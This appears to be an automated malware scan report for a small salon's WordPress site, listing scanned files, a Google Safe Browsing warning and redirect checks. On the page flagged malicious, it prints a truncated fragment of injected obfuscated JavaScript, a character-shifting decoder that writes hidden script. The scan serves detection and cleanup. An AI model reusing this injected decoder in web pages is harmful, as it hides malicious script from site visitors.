Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=imaginefamilysalon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://imaginefamilysalon.com/ | 200 OK Content-Length: 229266 Content-Type: text/html | clean |
http://imaginefamilysalon.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.2.1 | 200 OK Content-Length: 162701 Content-Type: application/x-javascript | clean |
http://platform.twitter.com/widgets.js?ver=3.2.1 | 200 OK Content-Length: 110239 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57254 Content-Type: application/javascript | clean |
http://info.template-help.com/files/ie6_warning/ie6_script.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 06:59:54 GMT Location: http://info.template-help.com/help/files/ie6_warning/ie6_script.js Server: nginx Content-Length: 362 Content-Type: text/html; charset=iso-8859-1 | clean |
http://info.template-help.com/help/files/ie6_warning/ie6_script.js | 200 OK Content-Length: 2284 Content-Type: application/x-javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/cufon-replace.js | 200 OK Content-Length: 160 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/Negotiate_Free_400.font.js | 200 OK Content-Length: 58936 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/Myriad_Pro_italic_600.font.js | 200 OK Content-Length: 87361 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/drop-down-menu.js | 200 OK Content-Length: 1983 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/jquery.faded.js | 200 OK Content-Length: 6410 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/wp-content/themes/theme1090/js/script.js | 200 OK Content-Length: 323 Content-Type: application/javascript | clean |
http://imaginefamilysalon.com/about-us/ | 200 OK Content-Length: 17609 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape('<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i )t =String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));} Antivirus reports:
| ||
http://imaginefamilysalon.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: imaginefamilysalon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 06:59:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: imaginefamilysalon.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 06:59:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: imaginefamilysalon.com
Referer: http://www.google.com/search?q=imaginefamilysalon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: imaginefamilysalon.com
Referer: http://www.google.com/search?q=imaginefamilysalon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.